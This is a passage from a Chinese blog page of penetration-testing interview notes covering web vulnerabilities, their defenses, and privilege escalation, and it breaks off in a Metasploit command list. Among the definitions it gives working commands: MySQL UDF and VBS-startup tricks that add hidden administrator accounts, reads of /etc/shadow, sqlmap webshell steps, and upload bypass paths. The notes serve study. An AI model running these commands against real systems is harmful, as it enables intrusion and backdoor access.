<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Hexo
    </title>
    <meta name="description" content= 嘿，我是Mortal这是我的博客，用于记录自己的笔记。欢迎指正！ >
    <meta name="keywords" content= Blog,Hexo,Theme,Mortal >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="：面试总结"><a href="#：面试总结" class="headerlink" title="：面试总结"></a>：面试总结</h1><h1 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h1><p>[TOC]</p>
<blockquote>
<p>如果你觉得我写的不够清楚，或者还有很多东西没有写。</p>
<p>那么一定是我觉得很简单不用写的内容，严格的来说，这些简答的内容，应该已经化作养分融入到了你的血液，成为了你的生物行为和习惯。</p>
<p>如果这些都不会，我觉得，就算你去忽悠面试官，你也忽悠不了。</p>
<p>所以还是老老实实学习吧。</p>
</blockquote>
<p><span style=font-size:25px;color:violet;background-color:red;>应该从喜欢里得到力量和快乐，</span><span style=font-size:20px;color:blue;background-color:black;>而不是耗尽你的所有快乐和喜欢得到力量。</span></p>
<p><span style=font-size:25px>爱一个行业和技能应该是长期的细水长流，而不是短暂的决堤崩洪。</span></p>
<h1 id="一、WEB："><a href="#一、WEB：" class="headerlink" title="一、WEB："></a>一、WEB：</h1><h2 id="1-SQL注入原理"><a href="#1-SQL注入原理" class="headerlink" title="1-SQL注入原理"></a>1-SQL注入原理</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">WEB应用程序对用户输入的数据</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">没有过滤或者过滤的不严谨</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">并且把用户输入的数据当作SQL 语句</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">带入到数据中去执行</span></span><br></pre></td></tr></table></figure>



<h2 id="2-SQL注入分类"><a href="#2-SQL注入分类" class="headerlink" title="2-SQL注入分类"></a>2-SQL注入分类</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">从反馈结果来分</span></span><br><span class="line">	1-回显型</span><br><span class="line">	2-无回显型/盲注</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">从攻击手法上来分</span></span><br><span class="line">	1-联合查询注入 union select</span><br><span class="line">	2-堆叠注入 ；</span><br><span class="line">	3-报错注入 updatexml、floor、ExtractValue 其他的用的不多不用说</span><br><span class="line">	4-盲注</span><br><span class="line">		4.1-布尔盲注</span><br><span class="line">		4.2-时间盲注</span><br><span class="line">	</span><br></pre></td></tr></table></figure>

<h2 id="3-SQL注入防御"><a href="#3-SQL注入防御" class="headerlink" title="3-SQL注入防御"></a>3-SQL注入防御</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">代码层防御</span></span><br><span class="line">	1-对用户输入的内容进行转义（PHP中addslashes()、mysql_real_escape()函数）。</span><br><span class="line">	2-限制关键字的输入（PHP中preg_replace()函数正则替换关键字），限制输入的长度 。</span><br><span class="line">	3-使用SQL语句预处理，对SQL语句首先进行预编译，然后进行参数绑定，最后传入参数。</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">网络层面</span></span><br><span class="line">	部署防护墙和软硬WAF</span><br></pre></td></tr></table></figure>

<h2 id="4-XSS原理"><a href="#4-XSS原理" class="headerlink" title="4-XSS原理"></a>4-XSS原理</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1-XSS漏洞是跨站脚本攻击</span><br><span class="line">2-是HTML代码的注入</span><br><span class="line">3-他是通过对网页，注入浏览器可执行的代码，从而实现的攻击手段。</span><br></pre></td></tr></table></figure>



<h2 id="5-XSS分类"><a href="#5-XSS分类" class="headerlink" title="5-XSS分类"></a>5-XSS分类</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1-反射型</span><br><span class="line">2-存储型</span><br><span class="line">3-DOM型</span><br></pre></td></tr></table></figure>



<h2 id="6-XSS区别"><a href="#6-XSS区别" class="headerlink" title="6-XSS区别"></a>6-XSS区别</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">反射型 和 存储型</span></span><br><span class="line">	都需需要经过服务器解析，并与数据库产生交互</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">DOM 型</span></span><br><span class="line">	只需要经过前端解析，不与数据库产生交互</span><br><span class="line"><span class="meta prompt_">	</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">存储型 和 DOM型</span></span><br><span class="line">	都会将攻击代码长期存在受害者服务器</span><br><span class="line"><span class="meta prompt_">	</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"> 反射型</span></span><br><span class="line">	而反射型，只会反弹一次攻击代码</span><br></pre></td></tr></table></figure>



<h2 id="7-CSRF-成功利用的条件"><a href="#7-CSRF-成功利用的条件" class="headerlink" title="7-CSRF 成功利用的条件"></a>7-CSRF 成功利用的条件</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1- 用户在统一浏览器下</span><br><span class="line">2- 没有关闭浏览器的情况下</span><br><span class="line">3- 访问了攻击者精心伪装好的恶意链接</span><br></pre></td></tr></table></figure>



<h2 id="8-SSRF原理"><a href="#8-SSRF原理" class="headerlink" title="8-SSRF原理"></a>8-SSRF原理</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1- 服务器允许向其他服务器获取资源</span><br><span class="line">2- 但是并没有对该地址做严格的过滤和限制</span><br><span class="line">3- 所以导致了攻击者可以向受害者服务器，传入任意的URL 地址，并将数据返回</span><br></pre></td></tr></table></figure>



<h2 id="9-SSRF危害"><a href="#9-SSRF危害" class="headerlink" title="9-SSRF危害"></a>9-SSRF危害</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1- SSRF漏洞几乎无所不能</span><br><span class="line">2- SQL注入</span><br><span class="line">3- Sturts2</span><br><span class="line">4- 端口探测</span><br><span class="line">5- 敏感信息泄露</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">最为主要的就是能够访问到外网无法访问的系统和服务器，漫游内网</span></span><br></pre></td></tr></table></figure>



<h2 id="10-SSRF防御"><a href="#10-SSRF防御" class="headerlink" title="10-SSRF防御"></a>10-SSRF防御</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1- 地址做白名单处理</span><br><span class="line">2- 域名识别ip,过滤内部ip</span><br><span class="line">3- 并校验返回的内容对比是否与假定的一致</span><br></pre></td></tr></table></figure>



<h2 id="11-文件上传分类"><a href="#11-文件上传分类" class="headerlink" title="11-文件上传分类"></a>11-文件上传分类</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1- 白名单</span><br><span class="line">2- 黑名单</span><br></pre></td></tr></table></figure>



<h2 id="12-文件上传的突破"><a href="#12-文件上传的突破" class="headerlink" title="12-文件上传的突破"></a>12-文件上传的突破</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1- 前端JS突破：抓包修改文件名 或者 禁用当前浏览器的JS脚本</span><br><span class="line">2- 后端突破：</span><br><span class="line">	2.1-黑名单：方法太多了 点、空格点、 php 1234567 、phphtml、分布式文件上传、文件流绕过....</span><br><span class="line">	2.2-白名单：比较鸡肋的00截断、时间竞争、双文件上传、双文件名...</span><br></pre></td></tr></table></figure>



<h2 id="13-你了解那些中间件"><a href="#13-你了解那些中间件" class="headerlink" title="13-你了解那些中间件"></a>13-你了解那些中间件</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1- iis6.x</span><br><span class="line">2- Apache</span><br><span class="line">3- iis7.5</span><br><span class="line">4- Nginx</span><br><span class="line">5- Tomcat</span><br><span class="line">6- Weblogic</span><br><span class="line">7- Jboos</span><br></pre></td></tr></table></figure>



<h2 id="14-你会那些解析漏洞"><a href="#14-你会那些解析漏洞" class="headerlink" title="14-你会那些解析漏洞"></a>14-你会那些解析漏洞</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">1- IIS6.X</span></span><br><span class="line">大多数为Windows server 2003，网站比较古老，如果要支持aspx,需要安装.NET框架</span><br><span class="line">	1.1- 利用2003系统的系统特性，但凡出现 \/.:;* 文件名的后面都会被舍弃</span><br><span class="line">			形式：www.xxx.com/xx.asp；.jpg</span><br><span class="line">	1.2-凡是文件名是apx结尾的，里面的任何文件都会被当作脚本语言解析</span><br><span class="line">	</span><br><span class="line">	1.3-除了asp、aspx以外，还有cer、cdx、asa 的后缀都可以被当作asp或者aspx脚本语言解析</span><br><span class="line">		形式：mamu.cer muma.cdx mamu.asa</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">2- Apache</span></span><br><span class="line">	1-muma.php.xxx.aaa 从左往右解析执行</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">3- Nginx</span></span><br><span class="line"><span class="meta prompt_">	# </span><span class="language-bash">Nginx和 IIS7.5 都是因为开启了CGI.FIX_PATHINFO参数，默认是以CGI的方式支持PHP解析的</span></span><br><span class="line">	1- www.xxxx.com/1.jpg/1.php</span><br><span class="line"></span><br><span class="line">	2- www.xxxx.com/1.jpg%00.php</span><br><span class="line"></span><br><span class="line">	3- www.xxxx.com/1.jpg/%20\0.php</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">4-IIS7.5</span></span><br><span class="line"><span class="meta prompt_">	# </span><span class="language-bash">Nginx和 IIS7.5 都是因为开启了CGI.FIX_PATHINFO参数，默认是以CGI的方式支持PHP解析的</span></span><br><span class="line">	1-在任意后缀后面加上x.php	</span><br><span class="line">		形式：www.xxx.com/logo.jpg/x.php</span><br><span class="line">			 www.xxx.com/logo.txt/x.php</span><br><span class="line">			 www.xxx.com/logo.doc/x.php</span><br></pre></td></tr></table></figure>



<h2 id="15-未授权访问漏洞"><a href="#15-未授权访问漏洞" class="headerlink" title="15-未授权访问漏洞"></a>15-未授权访问漏洞</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">常见的未授权访问漏洞：</span></span><br><span class="line"></span><br><span class="line">	1- Redis 未授权访问漏洞</span><br><span class="line">	2- MongoDB 未授权访问漏洞</span><br><span class="line">	3- Jenkins 未授权访问漏洞</span><br><span class="line">	4- Memcached 未授权访问漏洞</span><br><span class="line">	5- JBOSS 未授权访问漏洞</span><br><span class="line">	6- VNC 未授权访问漏洞</span><br><span class="line">	7- Docker 未授权访问漏洞</span><br><span class="line">	8- ZooKeeper 未授权访问漏洞</span><br><span class="line">	9- Rsync 未授权访问漏洞</span><br><span class="line">	10- Atlassian Crowd 未授权访问漏洞</span><br><span class="line">	11- CouchDB 未授权访问漏洞</span><br><span class="line">	12- Elasticsearch 未授权访问漏洞</span><br><span class="line">	13- Hadoop 未授权访问漏洞</span><br><span class="line">	14- Jupyter Notebook 未授权访问漏洞</span><br><span class="line">	</span><br></pre></td></tr></table></figure>

<blockquote>
<p>参考链接： <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6103">https://xz.aliyun.com/t/6103</a> </p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://paper.seebug.org/409/">https://paper.seebug.org/409/</a> </p>
<p>参考链接： <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/207877.html">https://www.freebuf.com/articles/web/207877.html</a> </p>
</blockquote>
<h2 id="16-XXE的原理"><a href="#16-XXE的原理" class="headerlink" title="16-XXE的原理"></a>16-XXE的原理</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">XXE漏洞就是xml外部实体注入漏洞，</span></span><br><span class="line">通常和危害一起回答出来会感觉更加流畅和自然</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">通常发生在应用程序解析XML输入时，没有禁止外部实体的加载，</span></span><br><span class="line">	导致可加载恶意外部文件，</span><br><span class="line">	造成文件读取、</span><br><span class="line">	命令执行、</span><br><span class="line">	内网端口扫描、</span><br><span class="line">	攻击内网网站、</span><br><span class="line">	发起dos攻击等危害。</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="17-XXE的分类"><a href="#17-XXE的分类" class="headerlink" title="17-XXE的分类"></a>17-XXE的分类</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1- 有回显型XXE</span><br><span class="line">2- 无回显型XXE</span><br></pre></td></tr></table></figure>

<h2 id="补充：XXE有哪些引入方式"><a href="#补充：XXE有哪些引入方式" class="headerlink" title="补充：XXE有哪些引入方式"></a>补充：XXE有哪些引入方式</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1- 本地映入</span><br><span class="line">2- 外部引入</span><br><span class="line">3- 外部参数实体引入</span><br></pre></td></tr></table></figure>



<h2 id="18-遇到XXE的盲注怎么办"><a href="#18-遇到XXE的盲注怎么办" class="headerlink" title="18-遇到XXE的盲注怎么办"></a>18-遇到XXE的盲注怎么办</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">如果遇到XXE无回显注入的话，可以选择使用DNS外带和 外部参数实体注入</span></span><br><span class="line">1- 在攻击者自己的公网服务器，准备一个test.dtd通过base64为将读取的内容加密得到的值当作传参值，发送给攻击者的公网服务器</span><br><span class="line"></span><br><span class="line">2-受害者那边，通过外部参数实体注入 访问攻击者公网服务器下的test.dtd文件</span><br><span class="line"></span><br><span class="line">3-最后看，攻击者公网服务器，的日志，转码得到受害者服务器的内容</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="20-遇到那些框架"><a href="#20-遇到那些框架" class="headerlink" title="20-遇到那些框架"></a>20-遇到那些框架</h2><h2 id="21-win提权"><a href="#21-win提权" class="headerlink" title="21-win提权"></a>21-win提权</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1-内核提权 systeminfo 寻找对应EXP</span><br></pre></td></tr></table></figure>



<h2 id="22-linux提权"><a href="#22-linux提权" class="headerlink" title="22-linux提权"></a>22-linux提权</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1- 脏牛提权</span><br><span class="line">2- sodu提权</span><br><span class="line">3- 内核提权</span><br></pre></td></tr></table></figure>

<h2 id="补充：说说你了解的脏牛提权"><a href="#补充：说说你了解的脏牛提权" class="headerlink" title="补充：说说你了解的脏牛提权"></a>补充：说说你了解的脏牛提权</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我当时没上来，有哪位老哥，比较好的答案，记得发给我啊，跪谢</span><br></pre></td></tr></table></figure>



<h2 id="23-数据库提权"><a href="#23-数据库提权" class="headerlink" title="23-数据库提权"></a>23-数据库提权</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">MySQL</span></span><br><span class="line">	1- mof提权</span><br><span class="line">	2- udf提权</span><br><span class="line">	3- VBS启动项提权</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">SQLserver</span></span><br><span class="line">	1-xp_cmdshell 扩展存储函数提权</span><br><span class="line">	2-差异备份提权</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Access</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="补充：MySQL-UDF提权的常用命令"><a href="#补充：MySQL-UDF提权的常用命令" class="headerlink" title="补充：MySQL UDF提权的常用命令"></a>补充：MySQL UDF提权的常用命令</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">create function cmdshell returns string soname &#x27;udf.dll&#x27;;</span><br><span class="line">select cmdshell(&#x27;net user liuyazhuang lyz123 /add&#x27;);</span><br><span class="line">select cmdshell(&#x27;net localgroup administrators liuyazhuang /add&#x27;);</span><br><span class="line">select cmdshell(&#x27;net localgroup administrators&#x27;);</span><br><span class="line">select cmdshell(&#x27;ipconfig/all&#x27;);</span><br><span class="line">select cmdshell(&#x27;net user&#x27;);</span><br><span class="line">select cmdshell(&#x27;regedit /s d:\wwwroot\3389.reg&#x27;);</span><br><span class="line">drop function cmdshell;</span><br><span class="line">select cmdshell(&#x27;netstat -an&#x27;);</span><br></pre></td></tr></table></figure>

<h2 id="补充：MySQL-VBS启动项提权"><a href="#补充：MySQL-VBS启动项提权" class="headerlink" title="补充：MySQL VBS启动项提权"></a>补充：MySQL VBS启动项提权</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">原理概述</span></span><br><span class="line">先通过WebShell连接数据库，通过建立表a将VBS脚本写入表中，然后导入启动项。该脚本仅对中文版有效，如果使用其他语言版本的操作系统，仅需对&quot;C:\\Documents and Settings\\All Users\\[开始]菜单\\程序\\启动\\a.vbs&quot;这个脚本进行相应更改。在VBS脚本后面有一个&quot;0&quot;，表示不弹出CMD窗口，以静默模式运行。该方法是在通过UDF提权失败的情况下，将VBS插入启动项中，待系统重启后将自动添加一个用户，</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">执行语句</span>	</span><br><span class="line">create table a (cmd text); # 创建一个a表 cmd字段 text是字段类型</span><br><span class="line">insert into a values(&quot;set wshshell=createobject(&quot;&quot;wscript.shell&quot;&quot;) &quot; );# 在a表里插入了一个vbsshell语句</span><br><span class="line"></span><br><span class="line">insert into a values(&quot;a=wshshell.run(&quot;&quot;cmd.exe /c net user xxoo 123123 /add&quot;&quot;,0) &quot; );# 用VBSshell执行了一个添加用户的操作</span><br><span class="line"></span><br><span class="line">insert into a values(&quot;b=wshshell.run(&quot;&quot;cmd.exe /c net localgroup administrators xxoo /add&quot;&quot;,0) &quot; );# 用VBSshell 执行了将xxoo这个用户，添加到了管理员组</span><br><span class="line">select * from a into outfile &quot;C:\\Documents and Settings\\All Users\\[开始]菜单\\程序\\启动\\a.vbs&quot;;	# 最后将a表里面的内容，插入到/写入到 启动项的目录下，并且保存文件名为a.vbs</span><br></pre></td></tr></table></figure>



<h2 id="补充：Linux下的MySQL提权"><a href="#补充：Linux下的MySQL提权" class="headerlink" title="补充：Linux下的MySQL提权"></a>补充：Linux下的MySQL提权</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysql -hlocalhost -uroot -p</span><br><span class="line">system useradd hacker</span><br><span class="line">system passwd hacker</span><br><span class="line">system tail -l /etc/passwd</span><br><span class="line">system tail -l /etc/shadow</span><br></pre></td></tr></table></figure>



<h2 id="24-说说SQLmap"><a href="#24-说说SQLmap" class="headerlink" title="24-说说SQLmap"></a>24-说说SQLmap</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">1-SQLmap 是最强大的注入工具，没有之一，几乎所有的数据库都可以注入</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">关键函数</span></span><br><span class="line">	--is-dba 								#当前用户权限（是否为root权限，mssql下最高权限为sa）</span><br><span class="line">	--dbs									#所有数据库</span><br><span class="line">	--current-db							#网站当前数据库</span><br><span class="line">	--users 								#所有数据库用户</span><br><span class="line">	--current-user 							#当前数据库用户</span><br><span class="line">	--random-agent 							#构造随机user-agent</span><br><span class="line">	--passwords 							#数据库密码</span><br><span class="line">	--proxy http://local:8080 –threads 10   #(可以自定义线程加速) 代理</span><br><span class="line">	--time-sec=TIMESEC DBMS					#响应的延迟时间（默认为5秒</span><br><span class="line">	--threads=                       		#使用多少线程</span><br><span class="line">	--batch									#自动化选择</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Cookie注入</span></span><br><span class="line">	sqlmap.py -u &quot;http://www.xxx.com?id=1注入点&quot; --cookie=&quot;cookie值&quot; --current-db  </span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">POST注入</span></span><br><span class="line">	sqlmap -r “数据包地址” -p “需要制定的参数” –dbms 需要制定的数据类型</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">GET注入</span></span><br><span class="line">	sqomap -u “注入点地址” --dbs 跟上你需要的参数</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">sqlmap进行交互式写shell</span></span><br><span class="line">	1-前提条件：最高权限、知道web网站绝对路径、能获取到cookie</span><br><span class="line">	2-    sqlmap.py -u &quot;注入点地址&quot; --cookie=&quot;cookie值&quot; --os-shell</span><br><span class="line">		2.1-echo “一句话木马”&gt;网站的绝对路径</span><br><span class="line">	3- 输入web网站的绝对路径</span><br><span class="line">	4-传木马</span><br><span class="line">	</span><br></pre></td></tr></table></figure>



<h2 id="25-说说Nmap"><a href="#25-说说Nmap" class="headerlink" title="25-说说Nmap"></a>25-说说Nmap</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Nmap 是一款网络扫描和主机检测的工具</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">常用的参数</span></span><br><span class="line">	nmap www.baidu.com　　  			  #扫描单一的一个主机）</span><br><span class="line">	nmap 192.168.1.154 　　　			　#扫描单一的一个主机）</span><br><span class="line">	nmap 192.168.1.1/24　　			 　#扫描整个子网</span><br><span class="line">	nmap 192.168.1.154 192.168.1.156    #扫描多个目标）</span><br><span class="line">	nmap 192.168.1.1-100 　　　　   	  #扫描IP地址为192.168.1.1-192.168.1.100内的所有主机</span><br><span class="line">	nmap -iL target.txt　　　　			  #扫描批量ip地址</span><br><span class="line">	nmap 192.168.1.1/24 -exclude 192.168.1.1 	 #扫描除过某一个 ip 外的所有子网主机</span><br><span class="line">	nmap 192.168.1.1/24 -exclude file xxx.txt  	 #xxx.txt 中的文件将会从扫描的主机中排除</span><br><span class="line">	nmap -p80,21,23 192.168.1.154　　				#扫描特定主机上的 80、21、23 端口</span><br><span class="line">	nmap -sS 192.168.1.1						 #半开放扫描比较喜欢用的一个</span><br><span class="line">	namap --script==vuln						 #扫漏洞，比较重的一个</span><br><span class="line">	namp -oN										 # 保存扫描结果</span><br><span class="line">	</span><br><span class="line">	基本这些就够用了，如果有大佬觉得还有更好的使用方式欢迎补充啊，跪谢</span><br></pre></td></tr></table></figure>



<h2 id="26-说说MSF"><a href="#26-说说MSF" class="headerlink" title="26-说说MSF"></a>26-说说MSF</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">常用命令</span></span><br><span class="line">	background 					#让meterpreter处于后台模式</span><br><span class="line">	sessions -i number 			#与会话进行交互，number表示第n个session</span><br><span class="line">	quit 						#退出会话</span><br><span class="line">	shell 						#获得命令行</span><br><span class="line">	cat c:\\boot.ini 			#查看文件内容</span><br><span class="line">	getwd 						#查看当前工作目录 work directory</span><br><span class="line">	upload /root/Desktop/netcat.exe c:\\ 				# 上传文件到目标机上</span><br><span class="line">	download 0xfa.txt /root/Desktop/ 					# 下载文件到本机上</span><br><span class="line">	edit c:\\boot.ini 									# 编辑文件</span><br><span class="line">	search -d d:\\www -f web.config 					#search 文件</span><br><span class="line">	ps 													#查看当前活跃进程</span><br><span 